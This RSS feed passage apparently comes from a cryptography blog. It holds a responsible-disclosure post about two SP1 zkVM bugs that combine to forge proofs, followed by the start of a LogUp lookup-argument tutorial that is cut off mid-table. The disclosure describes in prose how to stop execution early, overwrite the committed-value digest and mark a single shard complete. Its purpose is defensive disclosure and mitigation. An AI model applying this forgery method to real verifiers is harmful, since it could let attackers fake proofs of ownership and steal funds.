          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/responsible-disclosure-of-an-exploit-in-succincts-sp1-zkvm-found-in-partnership-with-3mi-labs-and-aligned-which-arises-from-the-interaction-of-two-distinct-security-vulnerabilities/">&lt;p&gt;&lt;strong&gt;TL;DR&lt;&#x2F;strong&gt; : We found two security bugs that can be combined to perform an exploit in Succinct’s SP1 zkVM, which allows you to generate false proofs. In severe cases, this could lead to loss of funds. This was found thanks to a collaboration between the top notch research &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.3milabs.tech&#x2F;&quot;&gt;3MI Labs&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;alignedlayer.com&#x2F;&quot;&gt;Aligned&lt;&#x2F;a&gt;, and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;lambdaclass.com&#x2F;&quot;&gt;LambdaClass&lt;&#x2F;a&gt;. This is a different security bug from the one we informed &lt;a href=&quot;&#x2F;the-future-of-zk-is-in-risc-v-zkvms-but-the-industry-must-be-careful-how-succincts-sp1s-departure-from-standards-causes-bugs&#x2F;&quot;&gt;previously in our blog&lt;&#x2F;a&gt; and it highlights the importance of having multiple teams paying attention to security and working towards having simpler codebases. For a PoC of the exploit, see the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;PoC-exploit-SP1&quot;&gt;following repo&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;LambdaClass and Fuzzing Labs will invest in further investigating critical security bugs in zkVMs. We believe that codebases have become too complex and over-engineered, and this gives rise to lots of bugs. We think that the industry is at risk if we do not invest, add more eyes, and simplify codebases. The industry has become complacent when it comes to security and is being pushed by business decisions to rush into production use, leaving aside these security issues, which could lead to very serious consequences. In this post, we analyze the case of SP1, but we think that all zkVM codebases need to be simplified and follow the standards, lowering the attack surface. As mentioned, we will conduct more thorough research on different zkVMs.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;We have seen in several engineering projects the development of long and complex codebases, with too many features and poor documentation and testing. Some people believe that having such codebases shows that you are smart, have excellent coding skills, and have given a lot of thought to everything. We think otherwise: the proof of mastery lies in simplicity. Bugs will always happen in any project, but the chance of having critical bugs increases with codebase complexity and length in a nonlinear way: the longer and more complex the code, the more bugs and hard-to-predict behaviors you can have. During our analysis of zk virtual machines and proof systems, we found two security bugs that can be combined to produce an exploit allowing a malicious party to prove false statements. Basically, you could generate false proofs for programs and modify some public inputs, which, in a world where computation is to be verified on chain using this technology, could lead to several exploits and loss of funds.&lt;&#x2F;p&gt;
&lt;p&gt;From our point of view, these exploits arise from the complexity of the codebase, having many files with different constraints and the addition of several features and optimizations that bloat the codebase. We also believe that business decisions are trying to rush these systems into production, when we should still focus on improving their security and auditability. We think that more care needs to be taken when designing, developing and testing zk virtual machines that could be used in real world applications, especially when funds are at risk.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;description-of-the-exploits&quot;&gt;Description of the exploits&lt;&#x2F;h2&gt;
&lt;p&gt;Two bugs were identified in the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;crates.io&#x2F;crates&#x2F;sp1-sdk&quot;&gt;&lt;code&gt;sp1-sdk&lt;&#x2F;code&gt;&lt;&#x2F;a&gt; crate at version 3.4.0, the most recently published version at the time we started our analysis. We were able to exploit them to generate valid SP1 proofs of incorrect execution of an arbitrary program, which results in universal forgeries of proofs for arbitrary statements, even incorrect ones.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;bug-descriptions&quot;&gt;Bug Descriptions&lt;&#x2F;h2&gt;
&lt;p&gt;This report describes two bugs:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * SP1-2.1: Unconstrained `committed_value_digest` without `COMMIT` syscalls&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * SP1-2.2: Unchecked `next_pc` Condition in First Layer of Recursion Tree&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h3 id=&quot;sp1-2-1-unconstrained-committed-value-digest-without-commit-syscalls&quot;&gt;SP1-2.1: Unconstrained &lt;code&gt;committed_value_digest&lt;&#x2F;code&gt; without &lt;code&gt;COMMIT&lt;&#x2F;code&gt; syscalls&lt;&#x2F;h3&gt;
&lt;p&gt;When an SP1 executor executes a guest program, the &lt;code&gt;COMMIT&lt;&#x2F;code&gt; syscalls (&lt;code&gt;0x00_00_00_10&lt;&#x2F;code&gt;) resulting from calls to &lt;code&gt;sp1_zkvm::io::commit()&lt;&#x2F;code&gt; are delayed to the end of the execution and emitted only when the &lt;code&gt;main&lt;&#x2F;code&gt; function &lt;em&gt;returns&lt;&#x2F;em&gt;.&lt;br &#x2F;&gt;
Since these syscalls are the only events that generate constraints on the &lt;code&gt;committed_value_digest&lt;&#x2F;code&gt; of the &lt;code&gt;ExecutionRecord&lt;&#x2F;code&gt;, this implies that if the execution of the program is halted before the return point of &lt;code&gt;main()&lt;&#x2F;code&gt;, then the &lt;code&gt;COMMIT&lt;&#x2F;code&gt; syscalls are never issued. As a result, the &lt;code&gt;committed_value_digest&lt;&#x2F;code&gt; remains initialised to the all-zero value and is not constrained during proof generation.&lt;&#x2F;p&gt;
&lt;p&gt;This absence of constraints on the digest of committed values during the execution of the program raises further questions on the compatibility of the verifier code of &lt;code&gt;sp1-sdk&lt;&#x2F;code&gt; with proofs of “arbitrary” program, but exploring this falls outside of the scope of this report.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;sp1-2-2-unchecked-next-pc-condition-in-first-layer-of-recursion-tree&quot;&gt;SP1-2.2: Unchecked &lt;code&gt;next_pc&lt;&#x2F;code&gt; Condition in First Layer of Recursion Tree&lt;&#x2F;h3&gt;
&lt;p&gt;In the verifying code for the first layer of the recursion tree, the condition &lt;code&gt;next_pc == 0&lt;&#x2F;code&gt; is not checked if a shard is indicated as containing a “complete” execution. However, this check is present in other recursion constraints (e.g., two-to-one proof compression, field-switch wrapping, proof-system switching).&lt;&#x2F;p&gt;
&lt;p&gt;Other checks exist that are performed on other code paths when &lt;code&gt;is_complete&lt;&#x2F;code&gt; is asserted but are missing from the first layer of the recursion tree; these may be critical to proof soundness, but were not used in our exploit. These can be found in &lt;code&gt;sp1_recursion_circuit::machine::complete::assert_complete&lt;&#x2F;code&gt; (for the recursive constraints) and &lt;code&gt;sp1_prover::verify::verify&lt;&#x2F;code&gt; (for the plain, uncompressed verification). These checks include whether:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * at least one execution shard is present&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * (execution) shard numbering is consecutive, and starts at one,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * the leaf challenger and the final reconstruct challenger match&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * the deferred proof digests are consistent, and&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * the cumulative sum is consistent.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;exploit-description&quot;&gt;Exploit Description&lt;&#x2F;h2&gt;
&lt;p&gt;Initially, an attempt to exploit SP1-2.1 was made by making an explicit &lt;code&gt;HALT&lt;&#x2F;code&gt; (&lt;code&gt;0x00_00_00_00&lt;&#x2F;code&gt;) syscall within &lt;code&gt;main()&lt;&#x2F;code&gt;.&lt;br &#x2F;&gt;
While this is not the methodology that was ultimately used, we note that making such explicit &lt;code&gt;HALT&lt;&#x2F;code&gt; syscalls within main might reasonably be passed off as an optimization within the guest program, e.g., by arguing that an early halt within main is a way to shorten a program’s execution trace and therefore reduce its proof computation time. This would seem innocent enough, but SP1-2.1 would then imply that the digest of public values produced before the syscall would remain unconstrained.&lt;&#x2F;p&gt;
&lt;p&gt;However, it suffices to instead create a malicious SP1 executor which stops executing the guest program at an arbitrary &lt;code&gt;pc&lt;&#x2F;code&gt; value. As long as the chosen &lt;code&gt;pc&lt;&#x2F;code&gt; value happens before the return point of &lt;code&gt;main()&lt;&#x2F;code&gt;, no &lt;code&gt;COMMIT&lt;&#x2F;code&gt; syscall will have been produced by the virtual machine. In the exploit presented here, the proof forgery was produced by stopping execution as soon as the program reached the start of the &lt;code&gt;main&lt;&#x2F;code&gt; function.&lt;&#x2F;p&gt;
&lt;p&gt;Before returning the resulting &lt;code&gt;ExecutionRecord&lt;&#x2F;code&gt;, the malicious executor is then free to replace the &lt;code&gt;committed_value_digest&lt;&#x2F;code&gt; of the &lt;code&gt;public_values: PublicValues&lt;&#x2F;code&gt; field with the digest of an arbitrary value. This makes it seem as if the guest program had committed to it during its execution.&lt;&#x2F;p&gt;
&lt;p&gt;Then, an honest &lt;code&gt;CoreProver&lt;&#x2F;code&gt; (&lt;code&gt;sp1_prover::components::SP1ProverComponents::CoreProver&lt;&#x2F;code&gt;) is run to generate an &lt;code&gt;SP1CoreProof&lt;&#x2F;code&gt; (&lt;code&gt;sp1_prover::types::SP1CoreProof&lt;&#x2F;code&gt;) with the maliciously crafted &lt;code&gt;ExecutionRecord&lt;&#x2F;code&gt;. Since there are no &lt;code&gt;COMMIT&lt;&#x2F;code&gt; syscalls contained within the record, the altered &lt;code&gt;committed_value_digest&lt;&#x2F;code&gt;, which does not match the digest of the values committed to by the program, does not cause the proof generation to fail. The &lt;code&gt;CoreProver&lt;&#x2F;code&gt; therefore successfully creates an &lt;code&gt;SP1CoreProof&lt;&#x2F;code&gt; containing two shards &lt;code&gt;s1&lt;&#x2F;code&gt; and &lt;code&gt;s2&lt;&#x2F;code&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;Finally, a malicious &lt;code&gt;SP1Prover&lt;&#x2F;code&gt; (&lt;code&gt;sp1_prover::SP1Prover&lt;&#x2F;code&gt;) is created with the following two modifications:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. The second shard `s2` of the `SP1CoreProof` is discarded.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. The `is_complete` flag is set to `true` in the `SP1RecursionWitnessValues` created from the remaining first shard `s1`. This recursion witness is then used when generating the recursion program for compressing the `SP1CoreProof` with a `CompressProver`.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Because the malicious executor stopped the guest program with a &lt;code&gt;next_pc&lt;&#x2F;code&gt; value pointing to the start of &lt;code&gt;main&lt;&#x2F;code&gt;, the first shard &lt;code&gt;s1&lt;&#x2F;code&gt; has a non-zero &lt;code&gt;next_pc&lt;&#x2F;code&gt; value. However, since the &lt;code&gt;is_complete&lt;&#x2F;code&gt; flag is &lt;code&gt;true&lt;&#x2F;code&gt;, SP1-2.2 implies that the &lt;code&gt;CompressProver&lt;&#x2F;code&gt; does not constrain the equality &lt;code&gt;next_pc == 0&lt;&#x2F;code&gt;, resulting in an &lt;code&gt;SP1ReduceProof&lt;&#x2F;code&gt; proof generated without errors. When de-serialized by an honest prover and submitted for verification, this &lt;code&gt;SP1ReduceProof&lt;&#x2F;code&gt; then passes &lt;em&gt;honest&lt;&#x2F;em&gt; verification for the guest program.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;exploit-demonstration&quot;&gt;Exploit demonstration&lt;&#x2F;h3&gt;
&lt;p&gt;We accompanied the bug report with two artefacts that demonstrate how the two bugs can be exploited to provide valid proofs of invalid execution of arbitrary programs. See the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;PoC-exploit-SP1&quot;&gt;repo for the code&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;The &lt;code&gt;is-prime&lt;&#x2F;code&gt; directory contains the source files and compiled ELF version of a program (&lt;code&gt;.&#x2F;is-prime&#x2F;program&lt;&#x2F;code&gt;) which checks the primality of a number read from &lt;code&gt;sp1_zkvm::io&lt;&#x2F;code&gt;, together with a script (&lt;code&gt;.&#x2F;is-prime&#x2F;script&lt;&#x2F;code&gt;) which demonstrates that &lt;code&gt;42-is-prime.proof&lt;&#x2F;code&gt; (&lt;code&gt;.&#x2F;is-prime&#x2F;script&#x2F;42-is-prime.proof&lt;&#x2F;code&gt;) is a valid proof that executing the program results in 42 being verified as a prime number.&lt;&#x2F;p&gt;
&lt;p&gt;The &lt;code&gt;i-am-satoshi&lt;&#x2F;code&gt; (&lt;code&gt;.&#x2F;i-am-satoshi&#x2F;&lt;&#x2F;code&gt;) directory contains an example of the transferability of this technique. Here, the guest program uses the independent &lt;code&gt;bitcoin&lt;&#x2F;code&gt; crate to compute the Bitcoin address corresponding to the secret key given as input, and then commits to the resulting address with &lt;code&gt;sp1_zkvm::io::commit()&lt;&#x2F;code&gt;. Running the corresponding verifier program (&lt;code&gt;.&#x2F;i-am-satoshi&#x2F;script&#x2F;src&#x2F;main.rs&lt;&#x2F;code&gt;) reveals that the proof demonstrates knowledge of the secret key behind the “genesis Satoshi address” &lt;code&gt;1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa&lt;&#x2F;code&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;This proof of concept illustrates arbitrary statement proving for the SP1 verifier, by verifying knowledge of the secret key to the reward address in the bitcoin genesis block. To perform these exploits, the prover client needs to be modified locally.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;consequences-and-limitations&quot;&gt;Consequences and Limitations&lt;&#x2F;h2&gt;
&lt;p&gt;While the first program presented in this exploit is innocent enough (42 is obviously not prime), the second one exemplifies more serious consequences.&lt;br &#x2F;&gt;
Proof of ownership of any address on any blockchain can be forged and would be accepted by a naïve verifier. We draw attention to the fact that the program itself &lt;em&gt;was not modified&lt;&#x2F;em&gt;. All of the modifications to create the proof forgery were performed &lt;strong&gt;locally to the proving client&lt;&#x2F;strong&gt;, which implies that this forgery methodology is generalizable to arbitrary guest programs.&lt;&#x2F;p&gt;
&lt;p&gt;We note that SP1-2.2 is a bug that is restricted to the first layer of the recursion tree, and that subsequent recursive proving of the proof would fail, because the &lt;code&gt;ShrinkProver&lt;&#x2F;code&gt; properly constrains the &lt;code&gt;next_pc == 0&lt;&#x2F;code&gt; check when &lt;code&gt;is_complete == true&lt;&#x2F;code&gt;.&lt;br &#x2F;&gt;
Nonetheless, the honest verifier code(&lt;code&gt;.&#x2F;is-prime&#x2F;script&#x2F;src&#x2F;bin&#x2F;verifier.rs&lt;&#x2F;code&gt;) is &lt;em&gt;agnostic&lt;&#x2F;em&gt; to the kind of proof that it deserializes which implies that the malicious prover is not forced to further reduce or wrap the forged proof before submitting it for verification to a system that runs the Rust verifier from the &lt;code&gt;sp1-sdk&lt;&#x2F;code&gt; crate.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;possible-mitigations&quot;&gt;Possible Mitigations&lt;&#x2F;h2&gt;
&lt;h3 id=&quot;mitigating-sp1-2-1&quot;&gt;Mitigating SP1-2.1&lt;&#x2F;h3&gt;
&lt;p&gt;Mitigating SP1-2.1 requires making sure that the &lt;code&gt;committed_value_digest&lt;&#x2F;code&gt; is constrained within the proof system, even if no &lt;code&gt;COMMIT&lt;&#x2F;code&gt; syscalls are made.&lt;&#x2F;p&gt;
&lt;p&gt;Any implementation of this mitigation would conflict with the current implementation which assumes that &lt;code&gt;committed_value_digest&lt;&#x2F;code&gt; is written to only once. A concrete proposal requires further exploration of the possibilities which is outside of the scope of this report.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;mitigating-sp1-2-2&quot;&gt;Mitigating SP1-2.2&lt;&#x2F;h3&gt;
&lt;p&gt;Ultimately, the code for the recursion program should be patched so that the &lt;code&gt;next_pc == 0&lt;&#x2F;code&gt; constraint (and the other related constraints for complete programs) is applied by the &lt;code&gt;CompressProver&lt;&#x2F;code&gt; in the first layer of the recursion tree, just like it is in the other recursion programs.&lt;&#x2F;p&gt;
&lt;p&gt;As a hot fix which would not be a breaking change to currently accepted verification keys, since the &lt;code&gt;next_pc&lt;&#x2F;code&gt; value is accessible as part of a proof’s&lt;br &#x2F;&gt;
public values, the Rust code of the verifier should check that it is &lt;code&gt;0&lt;&#x2F;code&gt;, even if this isn’t constrained within the proof system. This hot fix would further enable existing verifiers to check whether this bug was triggered by proofs that are still in storage.&lt;&#x2F;p&gt;
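&lt;p&gt;As an illustration only, a verifier-side check of this kind could look like the following Rust sketch. The struct and field names here are hypothetical stand-ins, not the actual &lt;code&gt;sp1-sdk&lt;&#x2F;code&gt; types:&lt;&#x2F;p&gt;

```rust
// Hypothetical stand-in for the public values carried by a proof;
// the actual sp1-sdk types and field names differ.
struct ProofPublicValues {
    next_pc: u32,
}

// Hot-fix check: reject any "complete" proof whose next_pc is nonzero,
// even though this equality is not constrained inside the proof system.
fn check_complete_proof(public_values: &ProofPublicValues) -> Result<(), String> {
    if public_values.next_pc != 0 {
        return Err(format!(
            "complete proof has nonzero next_pc: {:#010x}",
            public_values.next_pc
        ));
    }
    Ok(())
}

fn main() {
    // A forged proof produced as described above would carry the pc at
    // which execution was stopped (some arbitrary nonzero value).
    let forged = ProofPublicValues { next_pc: 0x0020_0800 };
    assert!(check_complete_proof(&forged).is_err());

    // An honestly generated complete proof ends with next_pc == 0.
    let honest = ProofPublicValues { next_pc: 0 };
    assert!(check_complete_proof(&honest).is_ok());
}
```

&lt;p&gt;The same check could be run retroactively over stored proofs to detect whether the bug was ever triggered.&lt;&#x2F;p&gt;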
&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;Together with 3MI Labs and Aligned, we found two security bugs in Succinct’s SP1 zkVM, and showed how to use them to perform an exploit that generates false proofs that an honest verifier would accept. Since these exploits do not require changing the code of the program and are performed locally, they could be used without naïve verifiers even suspecting that a proof is malicious. We think that the complexity and length of the codebase, as well as unclear documentation, contribute to the proliferation of bugs, and that we should be working harder on simplifying the codebases and on security, instead of rushing into production due to business concerns, especially when funds could be at risk.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>LogUp lookup argument and its implementation using Lambdaworks for continuous read-only memory</title>
          <pubDate>Fri, 27 Dec 2024 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/logup-lookup-argument-and-its-implementation-using-lambdaworks-for-continuous-read-only-memory/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/logup-lookup-argument-and-its-implementation-using-lambdaworks-for-continuous-read-only-memory/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/logup-lookup-argument-and-its-implementation-using-lambdaworks-for-continuous-read-only-memory/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;In a &lt;a href=&quot;&#x2F;continuous-read-only-memory-constraints-an-implementation-using-lambdaworks&#x2F;&quot;&gt;previous post&lt;&#x2F;a&gt;, we explained how to define constraints for a &lt;strong&gt;continuous read-only memory&lt;&#x2F;strong&gt; , presenting it as an example to understand how constraints are defined in general. This time, we will continue digging into this example to introduce the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2022&#x2F;1530&quot;&gt;LogUp&lt;&#x2F;a&gt; construction, adapted to univariate polynomials, and explain how we implemented it.&lt;&#x2F;p&gt;
&lt;p&gt;In what follows, we will assume that you have a notion of the concepts of constraints, a continuous read-only memory, and an idea of how they are implemented. To go deeper into these topics, we recommend reading the previously mentioned post, as this one will be its continuation.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;what-is-logup&quot;&gt;What is LogUp?&lt;&#x2F;h2&gt;
&lt;p&gt;LogUp is a case of a &lt;strong&gt;Lookup Argument&lt;&#x2F;strong&gt;. But what exactly are lookup arguments? They serve as a tool that allows us to prove efficiently that a specific value $v$ belongs to a table of values $T$ without revealing the entire table. This concept is handy for improving the efficiency of arguments for statements that are otherwise quite expensive to arithmetize.&lt;&#x2F;p&gt;
&lt;p&gt;In essence, a lookup argument enables the prover to convince the verifier that every element of a given set $A$ (often represented as a column of a trace table) is contained within another set $T$ (the lookup table). In this way, instead of arithmetizing many constraints to ensure that $A$ satisfies certain conditions, we precompute all the valid values that $A$ can take, write them in the table $T$, and then use a lookup argument to prove that all the elements of $A$ belong to $T$ (i.e., that they are valid elements). In other words, we manage to verify relationships between data while preserving privacy or optimizing computation.&lt;&#x2F;p&gt;
&lt;p&gt;An example of a Lookup argument can be found in the &lt;a href=&quot;&#x2F;continuous-read-only-memory-constraints-an-implementation-using-lambdaworks&#x2F;&quot;&gt;post mentioned above&lt;&#x2F;a&gt;. Let’s quickly check what we did there: given two columns, $a$ (addresses) and $v$ (values), we needed to create their corresponding sorted columns $a’$ and $v’$. We used a Lookup argument known as &lt;strong&gt;Grand Product&lt;&#x2F;strong&gt; to prove that they were permutations of the original ones.&lt;br &#x2F;&gt;
Using two random elements $z$ and $\alpha$, sampled from an extension of $\mathbb{F}$, we constructed an auxiliary column $p$ using:&lt;&#x2F;p&gt;
&lt;p&gt;$$p_{i + 1} = p_i \cdot \frac {z - (a_{i + 1} + \alpha v_{i + 1})} {z - (a^\prime_{i + 1} + \alpha v^\prime_{i + 1})},$$&lt;&#x2F;p&gt;
&lt;p&gt;The goal was to verify that the last element of this column equals one:&lt;&#x2F;p&gt;
&lt;p&gt;$$p_{n - 1} = \prod_{i = 0}^{n - 1} \frac {z - (a_i + \alpha v_i)} {z - (a^\prime_i + \alpha v^\prime_i)} = 1.$$&lt;&#x2F;p&gt;
&lt;p&gt;This guarantees that $a’$ and $v’$ are permutations of $a$ and $v$, ensuring the correctness of the table.&lt;&#x2F;p&gt;
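&lt;p&gt;To make the grand product check concrete, here is a small self-contained Rust sketch that builds the running product $p$ over a toy prime field for the memory table used later in this post and verifies that it ends at one. The modulus and the challenges &lt;code&gt;z&lt;&#x2F;code&gt; and &lt;code&gt;alpha&lt;&#x2F;code&gt; are arbitrary small stand-ins; a real STARK samples them from a large (extension) field:&lt;&#x2F;p&gt;

```rust
// Toy prime field F_p for illustration; a real STARK works over a large
// (extension) field with randomly sampled challenges z and alpha.
const P: u64 = 1_000_000_007;

// Modular exponentiation by squaring.
fn pow_mod(mut b: u64, mut e: u64) -> u64 {
    let mut acc = 1u64;
    b %= P;
    while e > 0 {
        if e & 1 == 1 {
            acc = acc * b % P;
        }
        b = b * b % P;
        e >>= 1;
    }
    acc
}

// Multiplicative inverse via Fermat's little theorem (P is prime).
fn inv(x: u64) -> u64 {
    pow_mod(x, P - 2)
}

fn main() {
    // Original columns (a, v) and a sorted permutation (a', v') of them.
    let a = [3u64, 2, 2, 3, 1, 3];
    let v = [30u64, 20, 40, 30, 10, 30];
    let ap = [1u64, 2, 2, 3, 3, 3];
    let vp = [10u64, 20, 40, 30, 30, 30];
    let (z, alpha) = (12_345u64, 6_789u64); // stand-ins for random challenges

    // Build the running product p_i; each step multiplies by
    // (z - (a_i + alpha * v_i)) / (z - (a'_i + alpha * v'_i)).
    let mut p = 1u64;
    for i in 0..a.len() {
        let num = (z + P - (a[i] + alpha * v[i]) % P) % P;
        let den = (z + P - (ap[i] + alpha * vp[i]) % P) % P;
        p = p * num % P * inv(den) % P;
    }
    // Since (a', v') is a permutation of (a, v), the product telescopes to 1.
    assert_eq!(p, 1);
}
```

&lt;p&gt;If $(a’, v’)$ were not a permutation of $(a, v)$, the numerators and denominators would not cancel, and the final product would differ from one with overwhelming probability over the choice of $z$ and $\alpha$.&lt;&#x2F;p&gt;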
&lt;p&gt;The idea behind &lt;strong&gt;LogUp&lt;&#x2F;strong&gt; is to replace these products with their &lt;strong&gt;logarithmic derivatives&lt;&#x2F;strong&gt;, or more simply, to transform the product into a sum of fractions. This approach reduces the computational effort for both the prover and the verifier. The method gets its name because the logarithmic derivative converts products like $\prod_{i = 1}^n (X - y_i)$ into sums:&lt;&#x2F;p&gt;
&lt;p&gt;$$\sum_{i = 1}^n \frac{1}{X - y_i}.$$&lt;&#x2F;p&gt;
&lt;p&gt;So, suppose we have a column $a = (a_0, \ldots, a_n)$ from the main trace containing repeated elements and a column $t = (t_0, \ldots, t_m)$ from the lookup table without duplicates, and we want to demonstrate that all the elements of $a$ belong to $t$. In that case, it is enough to prove the equality:&lt;&#x2F;p&gt;
&lt;p&gt;$$\sum_{i = 0}^n \frac{1}{\alpha - a_i} = \sum_{i = 0}^m \frac{m_i}{\alpha - t_i}$$&lt;&#x2F;p&gt;
&lt;p&gt;where $\alpha$ is a random element, and $m_i$ is the multiplicity of $t_i$ in $a$, that is, the number of times $t_i$ appears in $a$.&lt;&#x2F;p&gt;
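&lt;p&gt;This identity can be checked numerically. The following self-contained Rust sketch evaluates both sides over a toy prime field for $a = (3, 2, 2, 3, 1, 3)$, table $t = (1, 2, 3)$, and multiplicities $m = (1, 2, 3)$; the modulus and $\alpha$ are arbitrary stand-ins for the real field and random challenge:&lt;&#x2F;p&gt;

```rust
// Toy prime field; real implementations sample alpha from a large extension field.
const P: u64 = 1_000_000_007;

// Modular exponentiation by squaring.
fn pow_mod(mut b: u64, mut e: u64) -> u64 {
    let mut acc = 1u64;
    b %= P;
    while e > 0 {
        if e & 1 == 1 {
            acc = acc * b % P;
        }
        b = b * b % P;
        e >>= 1;
    }
    acc
}

// Multiplicative inverse via Fermat's little theorem (P is prime).
fn inv(x: u64) -> u64 {
    pow_mod(x, P - 2)
}

fn main() {
    // Column `a` with repetitions, lookup table `t` without duplicates,
    // and the multiplicity m[i] of each t[i] in a.
    let a = [3u64, 2, 2, 3, 1, 3];
    let t = [1u64, 2, 3];
    let m = [1u64, 2, 3];
    let alpha = 424_242u64; // stand-in for the random challenge

    // Left-hand side: sum over a of 1 / (alpha - a_i).
    let mut lhs = 0u64;
    for &ai in &a {
        lhs = (lhs + inv((alpha + P - ai) % P)) % P;
    }
    // Right-hand side: sum over t of m_i / (alpha - t_i).
    let mut rhs = 0u64;
    for (&ti, &mi) in t.iter().zip(&m) {
        rhs = (rhs + mi * inv((alpha + P - ti) % P)) % P;
    }
    assert_eq!(lhs, rhs);
}
```

&lt;p&gt;Changing any single entry of $a$ (or any multiplicity) makes the two sides differ for almost all choices of $\alpha$, which is exactly what the auxiliary column will enforce cumulatively.&lt;&#x2F;p&gt;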
&lt;p&gt;A natural question might arise at this point: is it really more efficient to replace products with sums, especially since doing so introduces fractions? As we’ll see later, we won’t work directly with these fractions. Instead, we’ll multiply both sides of the equation by the common denominator.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;continuous-read-only-memory-example&quot;&gt;Continuous read-only memory example&lt;&#x2F;h2&gt;
&lt;p&gt;To understand how the constraints of a LogUp argument are written, let’s go back to our example of a continuous read-only memory. To follow this example, we recommend accompanying it with the corresponding &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;blob&#x2F;logup-mem-example&#x2F;provers&#x2F;stark&#x2F;src&#x2F;examples&#x2F;read_only_memory_logup.rs&quot;&gt;implementation made in Lambdaworks&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;main-trace&quot;&gt;Main Trace&lt;&#x2F;h3&gt;
&lt;p&gt;First of all, we need to understand how the columns of the main trace are defined in the case of wanting to use a LogUp argument. We will proceed similarly to what we did in the first post. Given the address column $a$ and the value column $v$ of our memory, we will add three additional columns to the main trace: $a’,$ $v’$, and $m$. The $a’$ and $v’$ columns will contain the same values as $a$ and $v$ but will be sorted in ascending order without duplicating values. The column $m$ will represent the multiplicity of these values in the original columns. Since these columns do not have duplicates, they will be smaller. To ensure all columns have the same length and fit into a single table, we will pad $a’$ and $v’$ by repeating their last value and assigning a multiplicity of $0$ to these padded rows in the $m$ column.&lt;&#x2F;p&gt;
&lt;p&gt;Let’s see an example. If our original table was:&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;$a$&lt;&#x2F;th&gt;&lt;th&gt;$v$&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;30&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
